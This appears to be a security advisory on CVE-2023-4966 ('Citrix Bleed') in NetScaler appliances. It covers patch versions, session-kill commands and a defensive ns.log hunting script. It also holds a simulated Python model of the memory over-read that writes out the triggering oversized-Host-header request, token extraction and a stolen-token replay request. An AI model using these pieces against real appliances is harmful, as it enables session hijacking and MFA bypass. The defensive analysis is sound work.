NAVANEM
CVE-2023-4966 (exploited in the wild)

Citrix Bleed, NetScaler ADC session token disclosure

Improper restriction of operations within the bounds of a memory buffer in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server can lead to sensitive information disclosure. An attacker can extract session tokens directly from memory via a crafted HTTP request, then replay those tokens to impersonate authenticated users, bypassing MFA.

Overview

CVE-2023-4966, commonly known as "Citrix Bleed," is a critical (CVSS 9.4) vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances, disclosed by Citrix on October 10, 2023 and added to CISA's Known Exploited Vulnerabilities catalog on October 18, 2023. The flaw allows unauthenticated remote attackers to read sensitive data out of appliance memory, specifically the session tokens of users who are currently authenticated. It became notorious in late 2023 when LockBit affiliates weaponized it at scale; organizations whose breaches were publicly tied to Citrix Bleed exploitation include Boeing, the Industrial and Commercial Bank of China, DP World, Allen & Overy, and Comcast (Xfinity).

Technical Details

The vulnerability is a buffer over-read in how NetScaler ADC and Gateway appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server handle certain HTTP requests. As documented in Assetnote's public root-cause analysis, the unauthenticated /oauth/idp/.well-known/openid-configuration endpoint echoes the client-supplied Host header into several URLs in the JSON document it returns. The handler formats that JSON into a fixed-size buffer with an snprintf-style call and then uses the call's return value as the response length. snprintf returns the length the output would have had, not the number of bytes it actually stored, so an oversized Host header makes the appliance send the entire buffer plus whatever memory lies beyond it. That adjacent memory regularly contains the session tokens (NSC_AAAC cookie values) of users who are currently authenticated.

The attack chain is short:

  1. Send a GET for /oauth/idp/.well-known/openid-configuration with an oversized Host header to a vulnerable, internet-exposed NetScaler; no credentials are needed
  2. Parse the over-long response for session tokens (hex strings in the format of the NSC_AAAC cookie value)
  3. Present a captured token as the NSC_AAAC cookie in requests to the same NetScaler
  4. The appliance treats the request as the hijacked user's already-authenticated session, so no password or MFA challenge is ever presented
  5. Pivot into internal networks with whatever the compromised user can reach through the Gateway
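The over-read and the replay step, as an added model that is not NetScaler code and not Assetnote's or anyone else's published exploit. The handler below is a Python model of the documented root cause (the length an snprintf-style call would have written is used as the response length after the fixed-size buffer truncated the output), followed by the client-side extraction a tester would run on the leaked bytes. The buffer size, memory layout, 64-hex-character token format, the GetUserName verification path and the 24812-byte padding length are assumptions made for the example; nothing here is sent over the network.

```python
"""
Model of the CVE-2023-4966 over-read and the token-replay step that follows.
Added illustration, not NetScaler code. Buffer size, memory layout, token
format and padding length are constructed/assumed for this example.
"""
import re
import secrets

BUF_SIZE = 512                # constructed; models the fixed-size response buffer
SESSION_COOKIE = "NSC_AAAC"   # NetScaler AAA session cookie name
OPENID_PATH = "/oauth/idp/.well-known/openid-configuration"

# The endpoint echoes the Host header into several URLs, so a long Host header
# inflates the formatted length several times over (constructed template).
OPENID_TEMPLATE = (
    '{{"issuer":"https://{host}",'
    '"authorization_endpoint":"https://{host}/oauth/idp/login",'
    '"token_endpoint":"https://{host}/oauth/idp/token",'
    '"jwks_uri":"https://{host}/oauth/idp/certs",'
    '"userinfo_endpoint":"https://{host}/oauth/idp/userinfo"}}'
)


def make_memory(live_token: str) -> bytearray:
    """Constructed 'appliance memory': the response buffer, then unrelated
    allocations, one of which holds another user's live session cookie."""
    mem = bytearray(BUF_SIZE)
    mem += b"\x00" * 16
    mem += b"user=alice;" + f"{SESSION_COOKIE}={live_token};".encode() + b"\x00"
    mem += bytearray(64)
    return mem


def vulnerable_handler(mem: bytearray, host: str) -> bytes:
    """Flawed handler: formats the body into the fixed buffer (truncating like
    snprintf), then sends `needed` bytes, the untruncated length snprintf
    returns, instead of the `written` bytes actually stored."""
    body = OPENID_TEMPLATE.format(host=host).encode()
    needed = len(body)                    # snprintf's return value
    written = min(needed, BUF_SIZE - 1)   # bytes snprintf actually stores
    mem[0:written] = body[:written]
    mem[written] = 0
    return bytes(mem[0:needed])           # BUG: trusts `needed`, reads past the buffer


def fixed_handler(mem: bytearray, host: str) -> bytes:
    """Same handler with the response length taken from what was actually
    written (a real fix should also reject over-length Host headers)."""
    body = OPENID_TEMPLATE.format(host=host).encode()
    written = min(len(body), BUF_SIZE - 1)
    mem[0:written] = body[:written]
    mem[written] = 0
    return bytes(mem[0:written])


# Assumed token format: 32 bytes rendered as 64 lowercase hex characters.
# The lookarounds matter: the probe's own padding ("aaaa...") is also hex, so
# without boundaries the regex would "find" tokens inside the echoed Host header.
TOKEN_RE = re.compile(rb"(?<![0-9a-fA-F])[0-9a-f]{64}(?![0-9a-fA-F])")


def extract_tokens(leak: bytes) -> list[str]:
    """Pull candidate session tokens out of a leaked response (step 2)."""
    return [m.group(0).decode() for m in TOKEN_RE.finditer(leak)]


def build_probe_request(pad_len: int = 24812) -> bytes:
    """The request that triggers the over-read (step 1): the OpenID endpoint
    with an oversized Host header. 24812 is assumed here as the padding length
    used by public probes; this model never sends the request."""
    return (
        f"GET {OPENID_PATH} HTTP/1.1\r\n"
        f"Host: {'a' * pad_len}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def build_replay_request(target: str, token: str) -> bytes:
    """Step 3: present the stolen token as the session cookie. GetUserName is
    assumed here as the endpoint used to confirm a token is live; any
    authenticated Gateway page would do."""
    return (
        "GET /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\r\n"
        f"Host: {target}\r\n"
        f"Cookie: {SESSION_COOKIE}={token}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def run_chain(live_token: str, handler=vulnerable_handler, pad_len: int = 200) -> list[str]:
    """Drive the model end to end: oversized Host -> leak -> extracted tokens."""
    mem = make_memory(live_token)
    return extract_tokens(handler(mem, "a" * pad_len))


if __name__ == "__main__":
    token = secrets.token_hex(32)   # constructed "victim" session token
    print("benign host, vulnerable build:   ", run_chain(token, pad_len=14))
    print("oversized host, vulnerable build:", run_chain(token))
    print("oversized host, fixed build:     ", run_chain(token, handler=fixed_handler))
    print(build_replay_request("gw.example.com", token).decode())
```

The point to take from the model is the arithmetic: a Host header of ordinary length keeps `needed` below the buffer size and nothing leaks, while an oversized one pushes `needed` past the buffer and the appliance sends the adjacent memory verbatim. The boundary lookarounds in TOKEN_RE are the practical detail that trips up naive scanners, since the padding that triggers the bug is itself a long run of hex characters.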

Impact

The impact of Citrix Bleed was catastrophic for affected organizations:

  • Complete MFA bypass: a stolen token represents a session that has already passed every authentication step, so the attacker is never challenged for a password or a second factor
  • Enterprise-wide exposure: NetScaler appliances typically front VPN, application delivery, and AAA services, so a hijacked session grants broad access to the internal network
  • Mass ransomware campaigns: LockBit affiliates used this vulnerability as a primary initial access vector in late 2023, leading to confirmed ransomware deployments and large-scale data theft at major enterprises

Mitigation

Patching alone is insufficient because of one critical characteristic: tokens stolen before the upgrade remain valid after it, and existing sessions survive the upgrade. Complete remediation requires:

  1. Apply Citrix patches immediately: minimum versions 14.1-8.50, 13.1-49.15, or 13.0-92.19 (13.1-FIPS 13.1-37.164; 12.1-FIPS and 12.1-NDcrypt 12.1-55.300). NetScaler ADC 12.1 is End of Life, remains vulnerable, and must be migrated to a supported release
  2. After the upgrade, terminate all active and persistent sessions from the NetScaler CLI, per Citrix's guidance:
    • kill icaconnection -all
    • kill rdp connection -all
    • kill pcoipConnection -all
    • kill aaa session -all
    • clear lb persistentSessions
  3. Force credential rotation for all users
  4. Audit Active Directory logs for suspicious activity during the exposure window

Detection

Organizations should hunt for indicators of post-exploitation activity:

  • Unexpected Cobalt Strike beacons
  • Unauthorized RMM tools (AnyDesk, ScreenConnect and similar)
  • Anomalous admin actions in AD authentication logs
  • Gateway or application logins with no matching MFA challenge for that user during the exposure window (Mandiant observed exploitation from late August 2023 through the patch date)
  • In the appliance's own ns.log, Gateway sessions used from a Client_ip other than the one that authenticated them, which is the appliance-side signature of token replay
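The ns.log hunt for session reuse, as an added example that is not Citrix's or Mandiant's tooling. It groups SSLVPN events by SessionId and flags any event whose Client_ip differs from the IP that authenticated that session, or whose Context IP (bound at login) differs from the Client_ip. The log lines are constructed to mimic the SSLVPN LOGIN / TCPCONNSTAT / LOGOUT format; the field names follow ns.log, but the exact layout of a real line varies by build, so LINE_RE is an assumption to adjust against your own logs.

```python
"""
Hunt for hijacked Gateway sessions in NetScaler ns.log. Added example code;
the sample lines are constructed and LINE_RE approximates the real format.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: alice logs in from 203.0.113.10; her SessionId 42 is then
# used from 198.51.100.77, which never authenticated. bob's session 43 is clean.
SAMPLE_NS_LOG = """\
Oct 20 08:01:12 NS01 0-PPE-0 : default SSLVPN LOGIN 1001 0 : Context alice@203.0.113.10 - SessionId: 42 - User alice - Client_ip 203.0.113.10 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Browser_type "Mozilla/5.0 (Windows NT 10.0)" - SSLVPN_client_type ICA - Group(s) "N/A"
Oct 20 08:01:40 NS01 0-PPE-0 : default SSLVPN TCPCONNSTAT 1002 0 : Context alice@203.0.113.10 - SessionId: 42 - User alice - Client_ip 203.0.113.10 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Source 203.0.113.10:51122 - Destination 10.0.1.20:443 - Access Allowed - Group(s) "N/A"
Oct 20 08:03:05 NS01 0-PPE-0 : default SSLVPN LOGIN 1003 0 : Context bob@203.0.113.44 - SessionId: 43 - User bob - Client_ip 203.0.113.44 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Browser_type "Mozilla/5.0 (Windows NT 10.0)" - SSLVPN_client_type ICA - Group(s) "N/A"
Oct 20 08:17:51 NS01 0-PPE-0 : default SSLVPN TCPCONNSTAT 1004 0 : Context alice@203.0.113.10 - SessionId: 42 - User alice - Client_ip 198.51.100.77 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Source 198.51.100.77:40021 - Destination 10.0.1.30:3389 - Access Allowed - Group(s) "N/A"
Oct 20 08:18:02 NS01 0-PPE-0 : default SSLVPN TCPCONNSTAT 1005 0 : Context bob@203.0.113.44 - SessionId: 43 - User bob - Client_ip 203.0.113.44 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Source 203.0.113.44:52010 - Destination 10.0.1.20:443 - Access Allowed - Group(s) "N/A"
Oct 20 08:25:30 NS01 0-PPE-0 : default SSLVPN LOGOUT 1006 0 : Context alice@203.0.113.10 - SessionId: 42 - User alice - Client_ip 198.51.100.77 - Nat_ip "Mapped Ip" - Vserver 10.0.0.5:443 - Start_time "10/20/2023:08:01:12 GMT" - End_time "10/20/2023:08:25:30 GMT" - Duration 00:24:18 - LogoutMethod "Explicit" - Group(s) "N/A"
"""

# Assumed field layout; adjust to the lines your build actually writes.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?default SSLVPN (?P<event>\w+) \d+ \d+ : "
    r"Context (?P<user>[^@ ]+)@(?P<context_ip>\S+) - SessionId: (?P<sid>\d+) - "
    r"User \S+ - Client_ip (?P<client_ip>\S+)"
)


@dataclass
class Finding:
    session_id: str
    user: str
    login_ip: str
    seen_from: str
    event: str
    timestamp: str
    reason: str


def parse_line(line: str):
    """Return the named fields of one SSLVPN event, or None for other lines."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def hunt_session_reuse(log_text: str) -> list[Finding]:
    """Flag every event where a SessionId is used from a Client_ip other than
    the one that authenticated it, or where the Context IP and Client_ip
    disagree. Sessions whose LOGIN predates the log window are baselined on
    their first observed Client_ip, so a hijack that began before the window
    will not be caught; widen the window rather than trust a clean result."""
    baseline: dict[str, tuple[str, str]] = {}   # sid -> (user, authenticating ip)
    findings: list[Finding] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sid, ip = rec["sid"], rec["client_ip"]
        if rec["event"] == "LOGIN" or sid not in baseline:
            baseline[sid] = (rec["user"], ip)
        login_user, login_ip = baseline[sid]
        reasons = []
        if ip != login_ip:
            reasons.append("Client_ip differs from the IP that authenticated this SessionId")
        if rec["context_ip"] != ip:
            reasons.append("Context IP bound at login differs from Client_ip")
        if reasons:
            findings.append(Finding(sid, login_user, login_ip, ip, rec["event"],
                                    rec["ts"], "; ".join(reasons)))
    return findings


def hijacked_sessions(log_text: str) -> dict[str, set[str]]:
    """Collapse findings to SessionId -> foreign IPs, the list to kill and
    whose users need credential rotation."""
    out: dict[str, set[str]] = defaultdict(set)
    for f in hunt_session_reuse(log_text):
        if f.seen_from != f.login_ip:
            out[f.session_id].add(f.seen_from)
    return dict(out)


if __name__ == "__main__":
    for f in hunt_session_reuse(SAMPLE_NS_LOG):
        print(f"{f.timestamp} session {f.session_id} ({f.user}) {f.event} from "
              f"{f.seen_from}, authenticated from {f.login_ip}: {f.reason}")
    print(hijacked_sessions(SAMPLE_NS_LOG))
```

Run it against the ns.log files covering the full exposure window, not just the days around the patch; a legitimate user roaming between networks will also trip the Client_ip check, so treat each hit as a lead to correlate with the AD and MFA logs above rather than as proof on its own.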